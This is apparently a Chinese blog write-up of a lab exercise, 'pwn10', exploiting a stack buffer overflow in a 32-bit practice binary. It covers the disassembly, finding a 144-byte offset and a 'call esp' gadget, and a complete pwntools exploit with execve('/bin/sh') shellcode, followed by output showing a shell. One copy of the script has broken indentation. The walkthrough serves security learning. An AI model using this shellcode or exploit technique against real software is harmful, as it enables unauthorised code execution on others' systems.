pwn10详细过程

最新推荐文章于 2024-07-25 08:36:21 发布
原创 最新推荐文章于 2024-07-25 08:36:21 发布 · 1.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn

 

题目均为linux 32系统静态链接编译程序,关闭栈执行保护

要求:

1.需在Linux系统下安装pwntools。

2、编写python脚本,基于pwntool在本地加载目标测试程序,

通过脚本给程序灌入输入数据,构造的输入数据需绕过程序各种校验条件,达到漏洞触发路径,最后构造能够利用漏洞的样本。

 

题目中说了是32位系统的程序,但是如果没有说明的话,需要自己辨别,之前浏览博客的时候看到一个命令可以解决这个问题,当时没有保存,

现在找不见了,等以后找见了再补过来。

 

 

关闭地址随机化

ningan@ubuntu:~$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0

 

 

1.先执行这个可执行文件  发现有个字符串

 

ningan@ubuntu:~/anan/hw$ ./pwn10
Do you want the secret?
Now , give me your key:3
a
YQ==ningan@ubuntu:~/anan/hw$ 
ningan@ubuntu:~/anan/hw$ 

 

 

2.到ida中用search->text (Alt + t),输入关键字符,例如:secret,找到那个字符串的位置  那就是主函数的入口 

 

.text:08048DA0 ; __unwind {
.text:08048DA0                 push    ebp
.text:08048DA1                 mov     ebp, esp
.text:08048DA3                 sub     esp, 98h
.text:08048DA9                 sub     esp, 0Ch
.text:08048DAC                 push    offset aDoYouWantTheSe ; "Do you want the secret?"
.text:08048DB1                 call    sub_804F9C0
.text:08048DB6                 add     esp, 10h
.text:08048DB9                 sub     esp, 0Ch
.text:08048DBC                 push    offset aNowGiveMeYourK ; "Now , give me your key:"
.text:08048DC1                 call    sub_804F230
.text:08048DC6                 add     esp, 10h
.text:08048DC9                 sub     esp, 8
.text:08048DCC                 lea     eax, [ebp-0Ch]
.text:08048DCF                 push    eax
.text:08048DD0                 push    offset aD       ; "%d"
.text:08048DD5                 call    sub_804F270
.text:08048DDA                 add     esp, 10h
.text:08048DDD                 mov     eax, [ebp-0Ch]
.text:08048DE0                 cmp     eax, 0Ah
.text:08048DE3                 jle     short loc_8048E07
.text:08048DE5                 mov     eax, [ebp-0Ch]
.text:08048DE8                 cmp     eax, 1
.text:08048DEB                 jz      short loc_8048E07
.text:08048DED                 sub     esp, 0Ch
.text:08048DF0                 push    offset aWrongKey ; "Wrong key!"
.text:08048DF5                 call    sub_804F230
.text:08048DFA                 add     esp, 10h
.text:08048DFD                 sub     esp, 0Ch
.text:08048E00                 push    0               ; status
.text:08048E02                 call    sub_804E8A0

 

 

 

3.F5反汇编 看到伪代码

 

int sub_8048DA0()
{
  int v1; // [esp-90h] [ebp-90h]
  signed int v2; // [esp-10h] [ebp-10h]

  sub_804F9C0("Do you want the secret?");
  sub_804F230("Now , give me your key:");
  sub_804F270("%d", &v2);
  if ( v2 > 10 && v2 != 1 )
  {
    sub_804F230("Wrong key!");
    sub_804E8A0(0);
  }
  sub_80511D0();
  sub_804F840(&v1);
  sub_80489F6(&v1);
  return sub_804F230("%s");
}

 

 

 

4.分析伪代码  发现有溢出可以利用

 

分析该伪代码,结合之前在linux系统中运行结果分析如下:

运行代码,首先输出:Do you want the secret?  Now, give me your key:

当我们输入小于等于10但是不等于1的一个整数时,会提示我们继续输入(在函数sub_804F840)

然后下一个函数(sub_80489F6)会对输入的字符进行BASE65编码

最后一个函数(sub_804F230)对这个编码进行输出

 

ningan@ubuntu:~/anan/hw$ ./pwn10
Do you want the secret?
Now , give me your key:3
a
YQ==ningan@ubuntu:~/anan/hw$ 
ningan@ubuntu:~/anan/hw$ 

 

 

5.利用

 

(1)找返回地址

1)利用cyclic函数生成一些随机字符

ningan@ubuntu:~/anan/hw$ cyclic 200

 

2)进入gdb,在主函数0x08048da0处下断点,运行,利用刚刚生成的随机字符来覆盖栈上的数据

ningan@ubuntu:~/anan/hw$ gdb -q pwn10
gdb-peda$ b *0x08048da0
Breakpoint 1 at 0x8048da0
gdb-peda$ run
gdb-peda$ c

 

Continuing.
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Do you want the secret?
Now , give me your key:3
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
YWFhYWJhYWFjYWFhZGFhYWVhYWFmYWFhZ2FhYWhhYWFpYWFhamFhYWthYWFsYWFhbWFhYW5hYWFvYWFhcGFhYXFhYWFyYWFhc2FhYXRhYWF1YWFhdmFhYXdhYWF4YWFheWFhYXphYWJiYWFiY2FhYmRhYWJlYWFiZmFhYmdhYWJoYWFiaWFhYmphYWJrYWFibGFhYm1hYWJuYWFib2FhYnBhYWJxYWFicmFhYnNhYWJ0YWFidWFhYnZhYWJ3YWFieGFhYnlhYWI=
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x10c 
EBX: 0x80481b0 (push   ebx)
ECX: 0xffffffff 
EDX: 0x80ed4d4 --> 0x0 
ESI: 0x80ec00c --> 0x8065430 (mov    edx,DWORD PTR [esp+0x4])
EDI: 0x30 ('0')
EBP: 0x6261616b ('kaab')
ESP: 0xffffd0f0 ("maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
EIP: 0x6261616c ('laab')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x6261616c
[------------------------------------stack-------------------------------------]
0000| 0xffffd0f0 ("maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0004| 0xffffd0f4 ("naaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0008| 0xffffd0f8 ("oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0012| 0xffffd0fc ("paabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0016| 0xffffd100 ("qaabraabsaabtaabuaabvaabwaabxaabyaab")
0020| 0xffffd104 ("raabsaabtaabuaabvaabwaabxaabyaab")
0024| 0xffffd108 ("saabtaabuaabvaabwaabxaabyaab")
0028| 0xffffd10c ("taabuaabvaabwaabxaabyaab")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x6261616c in ?? ()
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
gdb-peda$ 
 

3)计算返回地址

说明:我用的是gdb-peda,在gdb中不能用cyclic函数。

但是组里的其他同学直接用gdb,或是pwngdb都可以直接用,这样子就可以直接找到返回地址前面输入了多少个字符。

 

gdb-peda$ cyclic 200
Undefined command: "cyclic".  Try "help".

gdb-peda$ cyclic_find(0x6261616c)
Undefined command: "cyclic_find".  Try "help".
 

但是我不能用啊,我就找了一个最简单粗暴的方法:数。因为cyclic函数生成的字符是有规律的,如下:

aaaa

baaa

caaa

...

xaaa

yaaa

zaab

baab

caab

daab

...

kaab

laab

maab

...

可以看到在laab前面有144个字符,就是说返回地址的前面我们填充了144个字符。

 

 

 

(2)构造payload

参考demo的例子

demo里是这样子构造的  sendPayload(p,'a'*44 + p32(0x080e5837) + shellcode + '\n')  

0x080e5837这个地址是call esp指令的地址,call esp的汇编指令时FFD4

我们可以仿照这个找pwn10中call wap指令的地址。如下:

 

在ida中search->sequence of bytes,输入:FF D4

 

点击“c”,将其转换为代码,如下:

 

'a'*144 + p32(0x080cb770) + shellcode

 

6.编写攻击代码

 

我:我改了这个和这个,但是怎么攻击不成功呢?

女神:那个demo的攻击代码看懂了吗?

我:没有

女神:看去

我:好

 

 

ningan@ubuntu:~/anan/hw$ vim pwn10.py
ningan@ubuntu:~/anan/hw$ python pwn10.py ./pwn10
[+] Starting local process './pwn10': pid 4855
Enter a number: 3
[*] Switching to interactive mode
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhcLcMCJCQkJBqaGgvLy9zaC9iaW6J42gBAQEBgTQkcmkBATHJUWoEWQHhUYnhMdJqO1iD6DDNgA==$ ls
core            peda-session-pwn_demo.txt  pwn04  pwn08     pwn_demo
linux_server        pwn01               pwn05  pwn09     pwn_demo.py
peda-session-pwn03.txt    pwn02               pwn06  pwn10
peda-session-pwn10.txt    pwn03               pwn07  pwn10.py
$ whoami
ningan
$ exit
[*] Got EOF while reading in interactive
$ quit
[*] Process './pwn10' stopped with exit code 127 (pid 4855)
[*] Got EOF while sending in interactive
ningan@ubuntu:~/anan/hw$ 

 

 

攻击成功

 

 

代码如下:

#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
        p.send(payload)

def pwn10(bin_path):
        shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')

        p=process(bin_path)
        p.settimeout(0.1)
        p.recvuntil(':')
        x = raw_input("Enter a number: ")
        sendPayload(p,x)
        sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
        p.interactive()

if __name__ == '__main__':
        pwn10(sys.argv[1])

 

ningan@ubuntu:~/anan/hw$ cat pwn10.py
#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
    p.send(payload)
    
def pwn10(bin_path):
    shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')
    
    p=process(bin_path)
    p.settimeout(0.1)
    p.recvuntil(':')
    x = raw_input("Enter a number: ")
    sendPayload(p,x)
    sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
    p.interactive()
    
if __name__ == '__main__':
    pwn10(sys.argv[1])
 

仿照pwn_demo.py编写

先输入一个<=10但是不为1的数字,然后输入我们构造好的字符串

pwn,攻击成功!

 

 

 

 

 

改进:之前的攻击需要手动输入一个数字,比较麻烦,我们利用下面的代码,将数字直接注入,

#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
    p.send(payload)
    
def pwn10(bin_path):
    shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')
    
    p=process(bin_path)
    p.settimeout(0.1)
    p.recvuntil(':')
    #x = raw_input("Enter a number: ")
        sendPayload(p,'4'+'\n')
        sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
           p.interactive()
    
if __name__ == '__main__':
    pwn10(sys.argv[1])

$ cat pwn10.py
#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
    p.send(payload)
    
def pwn10(bin_path):
    shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')
    
    p=process(bin_path)
    p.settimeout(0.1)
    p.recvuntil(':')
    #x = raw_input("Enter a number: ")
        sendPayload(p,'4'+'\n')
        sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
           p.interactive()
    
if __name__ == '__main__':
    pwn10(sys.argv[1])
 

要注意加\n,要不然攻击成功之后,输入命令就会直接退出。

 

用gdb查看内存

格式: x /nfu <addr>

说明
x 是 examine 的缩写

n表示要显示的内存单元的个数

f表示显示方式, 可取如下值
x 按十六进制格式显示变量。
d 按十进制格式显示变量。
u 按十进制格式显示无符号整型。
o 按八进制格式显示变量。
t 按二进制格式显示变量。
a 按十六进制格式显示变量。
i 指令地址格式
c 按字符格式显示变量。
f 按浮点数格式显示变量。

u表示一个地址单元的长度
b表示单字节,
h表示双字节,
w表示四字节,
g表示八字节

 

CTFshow-PWN-栈溢出(pwn60-pwn61)
Welcome To Myon'Blog !
07-08 846
摘要:本文分析了两个CTF pwn题目的解题过程。第一个32位程序(pwn60)存在RWX段和栈溢出漏洞,通过将shellcode写入.bss段并跳转执行成功getshell。第二个64位程序(pwn61)虽然开启了PIE保护,但通过printf泄露栈地址,由于shellcode空间不足,改用将shellcode写入栈中不受影响的偏移位置(v5_addr+0x20)成功执行。两个题目分别通过远程攻击获得flag:ctfshow{9129ee6c-b09e-47b8-addd-9accb8932587}和ct
PWN入门之Stack Overflow
2401_84434570的博客
05-06 1108
看一下正常情况,如果是正常情况的话,会返回到main函数中,这里需要注意一个细节,EIP这个寄存器,计算机会执行EIP指向的东西。根据这个原理,就可以进行构造,当ret的时候,EIP指向的东西为success函数的地址即可,这样就可以调用success函数了,从而达到劫持程序流的目的。在本篇文章中,我详细介绍了如何利用程序中本身存在的栈溢出漏洞,达到劫持程序流的目的,进而实现system("/bin/sh")的效果,如果你也对这个知识点感兴趣,欢迎阅读全文,内容篇幅较长,阅读时长约12分钟。
Pwn学习流程
cm_zl
04-23 513
Pwn前置技能: 汇编语言 C语言 python linux系统 Pwn环境搭建: ubantu(64位) python2 pip pwntools pwndbg 32位libc库 ……
pwn 程序保护
qq_40390383的博客
09-12 668
printf("%d", a) ,参数 a 在堆栈中的是 a 的地址, printf("%d",a)堆栈的结构 结合此题的堆栈的数据顺序 格式化字符串漏洞: 正常情况下printf("%s", a) 是输出a的值,但是如果直接使用 printf(a),虽然也可以输出a的值,但如果a中含有%x等格式化字符时,变会出现泄漏内存的情况 我们便在参数区输入 pwnme 的地址,利用%n 来更改其数值。 %n - 到目前为止所写的字符数 构造如下的 payload p32(pwnme_addr) +..
pwn入门
weixin_74485208的博客
03-19 2039
CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。接下来介绍相关的学习思路(自己总结的,当作参考)
PWN基础
Civit_的博客
03-27 990
学习pwn的基础
CTF-PWN相关程序素材积累
weixin_41038905的博客
04-21 478
PWN简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。pwn是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵Linux下的pwn常用到的工具有: gdb:Linux调试中必要用到的 gdb-pedagdb方便调试的工具,类似的工具有gef,gdbinit,这些...
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
PWN不欢沙龙演讲PPT.rar
05-20
10. **安全编程**:学习PWN的目的是为了更好地防止攻击,了解常见的编程陷阱和如何避免它们是每个开发者的必修课。 通过这个"无PWN不欢沙龙演讲PPT",观众可能学到了如何识别、利用和防范各种类型的漏洞,同时也会...
pwn-入门系列-0
lulu
07-05 1455
PWN 简单介绍: pwn简介 环境配置 工具准备 技能要求 ==>开始pwn之路 0x01 PWN是什么 ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声被“黑”的电脑或手机就被你操纵了. --百度百科 0x02 环境配置: 1.Ubuntu 32位/64位虚拟机. 2.IDA pro 3.Pwntoo...
【二进制安全PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
07-25 1万+
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
pwn学习笔记——基本操作流程记录(stuing)
weixin_45551695的博客
05-26 335
1栈溢出 复制到里面去 得到长度 基本流程大概记录一下,之后具体补充
PWN入门&Protostar靶场Stack系列
永远都没有了
01-24 1444
pwn入门靶场笔记
gdb调试之超长字符生成与定位
Xor0ne
04-19 2423
这篇文章主要讲解 kali 超长字符生成以及运行后定位溢出点的的几种方法。 文章目录一、源码二、编译三、调试过程**接下来,我们怎么判断程序是否存在溢出呢?——objdump**1、确定payload结构2、 查看system所在的相关函数3、填充字符个数方法一:msf方法二:peda——pattern方法三:pwntools——cyclic四、生成exp文件附录一: 一、源码 首先,老规矩,我们...
linux下gdb调试circle_x.c
natureworld2010的博客
07-14 383
终端使用gdb调试circle_x.c gdb就是GNU debugger 通过调试circle_x.c演示gdb调试器的使用。 调试使用的源码circle_x.c 实现输入半径得到面积的功能。 源码如图示。 源码实现效果如图示。 生成可调试文件 通过gcc -g circle_x.c -o circle_x.debug命令生成可调试文件 gdb circle_x.debug进入调试环境 gdb circle_x.debug 命令进入调试环境 run 命令执行运行过程 直接运行,如无bug直接输出结
pwn,获取系统权限,入门题,cyclic
weixin_42072280的博客
05-19 3917
https://blog.youkuaiyun.com/SanOrintea/article/details/82288959 大部分还是按照这个来的,就是关于数前面有多少个字符的时候,这个博客是用cyclic -l来数的,但是我在gdb中运行这个命令的时候显示有错误, 我觉得可能是因为那个博客是pwndbg,我是gdb-peda,所以,我就是列了这200个字符的规律,数了一下,当然按...
PWN入门学习之简单的栈溢出
2301_80718478的博客
06-28 1459
栈溢出是PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
ctf pwn 萌新学习记录 基本rop(题目来自Wiki)
weixin_73481933的博客
01-04 1860
此后又发现在 secure 函数又发现了存在调用system(“/bin/sh”) 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。下面就是我们如何构造 payload 了,首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。发现错了(原因:IDE可能会把栈的长度测量错了)
掌握pwn技术栈溢出技巧的10道练习题及解答
- 题目解答:在一些writeup中,还会包括对题目的完整解答,如获得flag的详细过程。 4. CTF竞赛: CTF是一种信息安全竞赛,涉及多种信息安全技能,包括但不限于逆向工程、密码学、网络攻防和二进制漏洞利用等。CTF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安安csdn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值